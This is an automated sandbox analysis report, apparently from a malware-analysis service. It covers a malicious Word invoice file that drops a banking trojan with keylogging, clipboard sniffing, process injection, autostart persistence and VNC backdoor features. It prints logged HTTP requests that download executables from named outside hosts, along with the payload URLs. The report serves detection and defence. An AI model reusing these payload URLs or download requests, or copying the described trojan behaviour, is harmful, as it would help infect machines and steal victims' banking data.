Loading ...

Analysis Report

Overview

General Information

Analysis ID:45867
Start time:11:24:00
Start date:08/08/2014
Overall analysis duration:0h 2m 49s
Report type:full
Sample file name:Rechnung_05052014.doc
Cookbook file name:default.jbs
Analysis system description:XP SP3 (Office 2003 SP1, Java 1.5.0, Acrobat Reader 8.1.2, Internet Explorer 6, Flash 10.1.82.76)
Number of analysed new started processes analysed:8
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:4
HCA enabled:true
HCA success:
  • true, ratio: 93%
  • Number of executed functions: 149
  • Number of non-executed functions: 1112
Warnings:
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtMapViewOfSection calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.
  • Report size getting too big, too many NtSetInformationProcess calls found.


Detection

StrategyReport FP/FN
Threshold malicious


Signature Overview


Protection of GUI:

barindex
Contains functionality to create a new desktopShow sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exeCode function: 5_2_0042886A OpenWindowStationW,CreateWindowStationW,GetProcessWindowStation,OpenDesktopW,CreateDesktopW,GetCurrentThreadId,GetThreadDesktop,SetThreadDesktop,CloseDesktop,CloseWindowStation,5_2_0042886A

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality for read data from the clipboardShow sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exeCode function: 5_1_00414477 OpenClipboard,5_1_00414477
Contains functionality to read the clipboard dataShow sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exeCode function: 5_2_004079BF InitializeCriticalSection,InitializeCriticalSection,InitializeCriticalSection,CreateFileW,ReadFile,CloseHandle,InitializeCriticalSection,GetModuleHandleW,GetModuleHandleW,GetModuleHandleW,GetFileAttributesExW,HttpSendRequestW,HttpSendRequestA,HttpSendRequestExW,HttpSendRequestExA,InternetCloseHandle,InternetReadFile,InternetReadFileExA,InternetQueryDataAvailable,HttpQueryInfoA,closesocket,send,WSASend,TranslateMessage,GetClipboardData,5_2_004079BF
Contains functionality to retrieve information about pressed keystrokesShow sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exeCode function: 5_2_00428575 EnterCriticalSection,GetTickCount,LeaveCriticalSection,GetKeyboardState,ToUnicode,TranslateMessage,5_2_00428575
Hooks clipboard functions (used to sniff clipboard data)Show sources
Source: explorer.exeIAT, EAT or inline hook detected: module: USER32.dll function: GetClipboardData

E-Banking Fraud:

barindex
Hooks winsocket function (used for sniffing or altering network traffic)Show sources
Source: explorer.exeFile created: function: InternetReadFile

Software Vulnerablities:

barindex
Document exploit detected (droppes PE files)Show sources
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXEFile created: ZwGuKEMphiZgNT.com.dr
Document exploit detected (performs DNS queries)Show sources
Source: global trafficDNS query: name: pensionmagda.cz
Document exploit detected (performs HTTP gets)Show sources
Source: global trafficTCP traffic: 192.168.1.13:1030 -> 217.198.114.63:80
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXEProcess created: C:\Documents and Settings\Administrator\ZwGuKEMphiZgNT.com
Document exploit detected (unknown TCP traffic)Show sources
Source: global trafficTCP traffic: 192.168.1.13:1030 -> 217.198.114.63:80

Networking:

barindex
Urls found in memory or binary dataShow sources
Source: 3463226.exeString found in binary or memory: http://
Source: Rechnung_05052014.docString found in binary or memory: http://office365.com
Source: Rechnung_05052014.docString found in binary or memory: http://office365.com/
Source: ZwGuKEMphiZgNT.comString found in binary or memory: http://pensionmagda.cz/wzrk.exe
Source: Rechnung_05052014.docString found in binary or memory: http://schemas.openxmlformats.org/drawingml/2006/main
Source: Rechnung_05052014.docString found in binary or memory: http://schemas.openxmlformats.org/officedocument/2006/bibliography
Source: Rechnung_05052014.docString found in binary or memory: http://schemas.openxmlformats.org/officedocument/2006/customxml
Source: 3463226.exeString found in binary or memory: http://www.google.com/webhp
Source: 3463226.exeString found in binary or memory: https://
Contains functionality to download additional files from the internetShow sources
Source: C:\Documents and Settings\Administrator\ZwGuKEMphiZgNT.comCode function: 4_2_00403867 recv,4_2_00403867
Downloads filesShow sources
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXEFile created: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.MSO
Tries to download non-existing http data (HTTP/1.1 404 Not Found)Show sources
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 08 Aug 2014 09:26:03 GMT Server: Apache/2.2.16 (Debian) Vary: accept-language,accept-charset,Accept-Encoding Accept-Ranges: bytes Connection: close Content-Type: text/html; charset=iso-8859-1 Content-Language: en Expires: Fri, 08 Aug 2014 09:26:03 GMT Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 49 53 4f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 Data Ascii: <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://ww
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /wzrk.exe HTTP/1.0 Host: pensionmagda.cz Accept-Language: en-US Accept: */* Accept-Encoding: identity, *;q=0 Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Source: global trafficHTTP traffic detected: GET /wzrk.exe HTTP/1.0 Host: www.pensionmagda.cz Accept-Language: en-US Accept: */* Accept-Encoding: identity, *;q=0 Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Source: global trafficHTTP traffic detected: GET /gdfyergjej.exe HTTP/1.0 Host: pianossimi.fr Accept-Language: en-US Accept: */* Accept-Encoding: identity, *;q=0 Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: pensionmagda.cz
Uses a known web browser user agent for HTTP communicationShow sources
Source: global trafficHTTP traffic detected: GET /wzrk.exe HTTP/1.0 Host: pensionmagda.cz Accept-Language: en-US Accept: */* Accept-Encoding: identity, *;q=0 Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Source: global trafficHTTP traffic detected: GET /wzrk.exe HTTP/1.0 Host: www.pensionmagda.cz Accept-Language: en-US Accept: */* Accept-Encoding: identity, *;q=0 Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Source: global trafficHTTP traffic detected: GET /gdfyergjej.exe HTTP/1.0 Host: pianossimi.fr Accept-Language: en-US Accept: */* Accept-Encoding: identity, *;q=0 Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)

Boot Survival:

barindex
Creates an autostart registry keyShow sources
Source: C:\WINDOWS\explorer.exeRegistry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run gonuu.exe
Source: C:\WINDOWS\explorer.exeRegistry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run gonuu.exe
Drops PE files to the user root directory (C:\Documents and Settings\User or C:\Users\User)Show sources
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXEFile created: C:\Documents and Settings\Administrator\ZwGuKEMphiZgNT.com
Monitors registry run keys for changesShow sources
Source: C:\WINDOWS\system32\ctfmon.exeRegistry key monitored: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run

Remote Access Functionality:

barindex
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)Show sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exeCode function: 5_2_0041B962 socket,bind,closesocket,5_2_0041B962
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exeCode function: 5_2_0041B57B socket,bind,listen,closesocket,5_2_0041B57B
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exeCode function: 5_2_00BBB962 socket,bind,closesocket,5_2_00BBB962
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exeCode function: 5_2_00BBB57B socket,bind,listen,closesocket,5_2_00BBB57B
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeCode function: 6_2_0041B962 socket,bind,closesocket,6_2_0041B962
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeCode function: 6_2_0041B57B socket,bind,listen,closesocket,6_2_0041B57B
Source: C:\WINDOWS\explorer.exeCode function: 7_2_00E4B57B socket,bind,listen,#3,7_2_00E4B57B
Source: C:\WINDOWS\explorer.exeCode function: 7_2_00E4B962 socket,bind,#3,7_2_00E4B962
Source: C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exeCode function: 8_2_00A0B57B socket,bind,listen,#3,8_2_00A0B57B
Source: C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exeCode function: 8_2_00A0B962 socket,bind,#3,8_2_00A0B962
Source: C:\WINDOWS\system32\ctfmon.exeCode function: 9_2_00A4B962 socket,bind,#3,9_2_00A4B962
Source: C:\WINDOWS\system32\ctfmon.exeCode function: 9_2_00A4B57B socket,bind,listen,#3,9_2_00A4B57B
Opens a port and listens for incoming connection (possibly a backdoor)Show sources
Source: C:\WINDOWS\explorer.exeSocket bind: port: 38677
Contains VNC / remote desktop functionality (RFB version string found)Show sources
Source: 3463226.exeString found in binary or memory: RFB 003.003

Persistence and Installation Behavior:

barindex
Drops PE filesShow sources
Source: C:\Documents and Settings\Administrator\ZwGuKEMphiZgNT.comFile created: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exe
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXEFile created: C:\Documents and Settings\Administrator\ZwGuKEMphiZgNT.com
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exeFile created: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exe
Drops PE files to the user directory (C:\Documents and Settings\)Show sources
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXEFile created: C:\Documents and Settings\Administrator\ZwGuKEMphiZgNT.com
Drops PE files with a suspicious file extensionShow sources
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXEFile created: C:\Documents and Settings\Administrator\ZwGuKEMphiZgNT.com

Data Obfuscation:

barindex
Contains functionality to dynamically determine API callsShow sources
Source: C:\Documents and Settings\Administrator\ZwGuKEMphiZgNT.comCode function: 4_2_0040236E LoadLibraryA,LoadLibraryA,GetProcAddress,4_2_0040236E

Spreading:

barindex
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exeCode function: 5_2_0041DD7A FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,5_2_0041DD7A

System Summary:

barindex
Has a correct PE checksumShow sources
Source: initial sampleStatic PE information: Present: = calced
Contains functionality to access the windows certificate storeShow sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exeCode function: 5_2_00420A6C CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,PFXExportCertStoreEx,PFXExportCertStoreEx,PFXExportCertStoreEx,CharLowerW,GetSystemTime,CertCloseStore,5_2_00420A6C
Contains functionality to adjust token privileges (e.g. debug / backup)Show sources
Source: C:\Documents and Settings\Administrator\ZwGuKEMphiZgNT.comCode function: 4_2_0040280F LookupPrivilegeValueA,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,4_2_0040280F
Contains functionality to enum processes or threadsShow sources
Source: C:\Documents and Settings\Administrator\ZwGuKEMphiZgNT.comCode function: 4_2_00402B98 WTSGetActiveConsoleSessionId,CreateToolhelp32Snapshot,Process32First,StrStrIA,ProcessIdToSessionId,OpenProcess,OpenProcessToken,ImpersonateLoggedOnUser,RegOpenCurrentUser,CloseHandle,CloseHandle,CloseHandle,Process32Next,CloseHandle,4_2_00402B98
Creates files inside the user directoryShow sources
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXEFile created: C:\Documents and Settings\Administrator\Application Data\Microsoft\Office
Creates temporary filesShow sources
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXEFile created: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~DFD7A6.tmp
Executes batch filesShow sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exeProcess created: C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp17a7aa60.bat
Reads ini filesShow sources
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXEFile read: C:\WINDOWS\win.ini
Spawns processesShow sources
Source: unknownProcess created: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE
Source: unknownProcess created: C:\WINDOWS\system32\svchost.exe
Source: unknownProcess created: C:\Documents and Settings\Administrator\ZwGuKEMphiZgNT.com
Source: unknownProcess created: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exe
Source: unknownProcess created: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exe
Source: unknownProcess created: C:\WINDOWS\system32\cmd.exe
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXEProcess created: C:\Documents and Settings\Administrator\ZwGuKEMphiZgNT.com ZwGuKEMphiZgNT.com
Source: C:\Documents and Settings\Administrator\ZwGuKEMphiZgNT.comProcess created: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exe C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exe
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exeProcess created: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exe C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exe
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exeProcess created: C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp17a7aa60.bat
Contains functionality to call native functionsShow sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exeCode function: 5_2_004088DB EntryPoint,SetErrorMode,GetCommandLineW,CommandLineToArgvW,ExitProcess,NtClose,NtClose,NtClose,NtClose,NtClose,Sleep,NtClose,5_2_004088DB
Contains functionality to launch a process as a different userShow sources
Source: C:\Documents and Settings\Administrator\ZwGuKEMphiZgNT.comCode function: 4_2_00402D3C CreateProcessAsUserA,ShellExecuteA,ShellExecuteA,4_2_00402D3C
Contains functionality to shutdown / reboot the systemShow sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exeCode function: 5_2_00408600 CreateMutexW,ExitWindowsEx,OpenEventW,CloseHandle,SetEvent,CloseHandle,CloseHandle,5_2_00408600
Creates files inside the system directoryShow sources
Source: C:\WINDOWS\system32\svchost.exeFile created: C:\WINDOWS\Sti_Trace.log
Creates mutexesShow sources
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMutant created: \BaseNamedObjects\Local\{893B0272-6967-6ED8-A961-10791936558D}
Source: C:\WINDOWS\explorer.exeMutant created: \BaseNamedObjects\Global\{F767013F-6A2A-1084-936E-5D42233918B6}
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMutant created: \BaseNamedObjects\Global\{F767013F-6A2A-1084-736D-5D42C33A18B6}
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exeMutant created: \BaseNamedObjects\Global\{A89158AA-33BF-4F72-A961-10791936558D}
Source: C:\WINDOWS\explorer.exeMutant created: \BaseNamedObjects\Global\{F767013F-6A2A-1084-736A-5D42C33D18B6}
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMutant created: \BaseNamedObjects\Global\{F767013F-6A2A-1084-A76C-5D42173B18B6}
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMutant created: \BaseNamedObjects\Global\{F767013F-6A2A-1084-036C-5D42B33B18B6}
Source: C:\WINDOWS\explorer.exeMutant created: \BaseNamedObjects\Global\{F767013F-6A2A-1084-0B6B-5D42BB3C18B6}
Source: C:\WINDOWS\explorer.exeMutant created: \BaseNamedObjects\Global\{F767013F-6A2A-1084-D368-5D42633F18B6}
Source: C:\WINDOWS\explorer.exeMutant created: \BaseNamedObjects\Global\{F767013F-6A2A-1084-836F-5D42333818B6}
Source: C:\WINDOWS\explorer.exeMutant created: \BaseNamedObjects\Global\{83DE351B-5E0E-643D-A961-10791936558D}
Source: C:\WINDOWS\explorer.exeMutant created: \BaseNamedObjects\Global\{D071451D-2E08-3792-A961-10791936558D}
Source: C:\WINDOWS\explorer.exeMutant created: \BaseNamedObjects\Local\{2693D86C-B379-C170-A961-10791936558D}
Source: C:\WINDOWS\system32\ctfmon.exeMutant created: \BaseNamedObjects\Global\{F0DDC10A-AA1F-173E-A961-10791936558D}
Source: C:\WINDOWS\explorer.exeMutant created: \BaseNamedObjects\Global\{3CF0361E-5D0B-DB13-A961-10791936558D}
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMutant created: \BaseNamedObjects\Global\{F767013F-6A2A-1084-AB6C-5D421B3B18B6}
Source: C:\WINDOWS\explorer.exeMutant created: \BaseNamedObjects\Global\{F767013F-6A2A-1084-EF68-5D425F3F18B6}
Source: C:\WINDOWS\explorer.exeMutant created: \BaseNamedObjects\Global\{F767013F-6A2A-1084-1B68-5D42AB3F18B6}
Source: C:\WINDOWS\explorer.exeMutant created: \BaseNamedObjects\Global\{F767013F-6A2A-1084-E769-5D42573E18B6}
Source: C:\WINDOWS\explorer.exeMutant created: \BaseNamedObjects\Global\{2C76EF05-8410-CB95-A961-10791936558D}
Source: C:\WINDOWS\explorer.exeMutant created: \BaseNamedObjects\Global\{49E5DF87-B492-AE06-A961-10791936558D}
Source: C:\WINDOWS\explorer.exeMutant created: \BaseNamedObjects\Global\{F767013F-6A2A-1084-E76C-5D42573B18B6}
Source: C:\WINDOWS\explorer.exeMutant created: \BaseNamedObjects\Global\{F767013F-6A2A-1084-2368-5D42933F18B6}
Source: C:\WINDOWS\explorer.exeMutant created: \BaseNamedObjects\Global\{F767013F-6A2A-1084-2B6B-5D429B3C18B6}
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMutant created: \BaseNamedObjects\Global\{F767013F-6A2A-1084-AF6A-5D421F3D18B6}
Source: C:\WINDOWS\explorer.exeMutant created: \BaseNamedObjects\Global\{F767013F-6A2A-1084-3769-5D42873E18B6}
Source: C:\WINDOWS\explorer.exeMutant created: \BaseNamedObjects\Global\{F767013F-6A2A-1084-9369-5D42233E18B6}
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMutant created: \BaseNamedObjects\Global\{F767013F-6A2A-1084-AF6F-5D421F3818B6}
Source: C:\WINDOWS\explorer.exeMutant created: \BaseNamedObjects\Global\{1ABBC0FC-ABE9-FD58-A961-10791936558D}
Source: C:\WINDOWS\explorer.exeMutant created: \BaseNamedObjects\Global\{F767013F-6A2A-1084-CB6B-5D427B3C18B6}
Source: C:\WINDOWS\explorer.exeMutant created: \BaseNamedObjects\Local\{C8E1263D-4D28-2F02-A961-10791936558D}
Source: C:\WINDOWS\explorer.exeMutant created: \BaseNamedObjects\Global\{55902C7D-4768-B273-A961-10791936558D}
Source: C:\WINDOWS\explorer.exeMutant created: \BaseNamedObjects\Global\{F767013F-6A2A-1084-1F6E-5D42AF3918B6}
Enables driver privilegesShow sources
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXEProcess token adjusted: Load Driver
Enables security privilegesShow sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exeProcess token adjusted: Security
Reads the hosts fileShow sources
Source: C:\Documents and Settings\Administrator\ZwGuKEMphiZgNT.comFile read: C:\WINDOWS\system32\drivers\etc\hosts
Tries to load missing DLLsShow sources
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXESection loaded: xpsp2res.dll
Source: C:\WINDOWS\system32\svchost.exeSection loaded: xpsp2res.dll
Source: C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exeSection loaded: xpsp2res.dll

HIPS / PFW / Operating System Protection Evasion:

barindex
Contains functionality to add an ACL to a security descriptorShow sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exeCode function: 5_2_0041BB34 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,LocalFree,5_2_0041BB34
Contains functionality to create a new security descriptorShow sources
Source: C:\Documents and Settings\Administrator\ZwGuKEMphiZgNT.comCode function: 4_2_00402E8B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,4_2_00402E8B
May try to detect the Windows Explorer process (often used for injection)Show sources
Source: WINWORD.EXEBinary or memory string: Program Manager
Source: WINWORD.EXEBinary or memory string: Shell_TrayWnd
Allocates memory in foreign processesShow sources
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory allocated: C:\WINDOWS\explorer.exe base: E30000 protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory allocated: C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe base: 9F0000 protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory allocated: C:\WINDOWS\system32\ctfmon.exe base: A30000 protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory allocated: C:\WINDOWS\system32\wscntfy.exe base: AF0000 protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory allocated: unknown base: 47F0000 protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory allocated: unknown base: BA0000 protect: page execute and read and write
Changes memory attributes in foreign processes to executable or writableShow sources
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory protected: C:\WINDOWS\explorer.exe base: E30000 protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory protected: C:\WINDOWS\explorer.exe base: E62AB0 protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory protected: C:\WINDOWS\explorer.exe base: E62000 protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory protected: C:\WINDOWS\explorer.exe base: E62AC4 protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory protected: C:\WINDOWS\explorer.exe base: E62F88 protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory protected: C:\WINDOWS\explorer.exe base: E62F8C protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory protected: C:\WINDOWS\explorer.exe base: E629A0 protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory protected: C:\WINDOWS\explorer.exe base: E62AF4 protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory protected: C:\WINDOWS\explorer.exe base: E62980 protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory protected: C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe base: 9F0000 protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory protected: C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe base: A22AB0 protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory protected: C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe base: A22000 protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory protected: C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe base: A22AC4 protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory protected: C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe base: A22F88 protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory protected: C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe base: A22F8C protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory protected: C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe base: A229A0 protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory protected: C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe base: A22AF4 protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory protected: C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe base: A22980 protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory protected: C:\WINDOWS\system32\ctfmon.exe base: A30000 protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory protected: C:\WINDOWS\system32\ctfmon.exe base: A62AB0 protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory protected: C:\WINDOWS\system32\ctfmon.exe base: A62000 protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory protected: C:\WINDOWS\system32\ctfmon.exe base: A62AC4 protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory protected: C:\WINDOWS\system32\ctfmon.exe base: A62F88 protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory protected: C:\WINDOWS\system32\ctfmon.exe base: A62F8C protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory protected: C:\WINDOWS\system32\ctfmon.exe base: A629A0 protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory protected: C:\WINDOWS\system32\ctfmon.exe base: A62AF4 protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory protected: C:\WINDOWS\system32\ctfmon.exe base: A62980 protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory protected: C:\WINDOWS\system32\wscntfy.exe base: AF0000 protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory protected: C:\WINDOWS\system32\wscntfy.exe base: B22AB0 protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory protected: C:\WINDOWS\system32\wscntfy.exe base: B22000 protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory protected: C:\WINDOWS\system32\wscntfy.exe base: B22AC4 protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory protected: C:\WINDOWS\system32\wscntfy.exe base: B22F88 protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory protected: C:\WINDOWS\system32\wscntfy.exe base: B22F8C protect: page execute and read and write
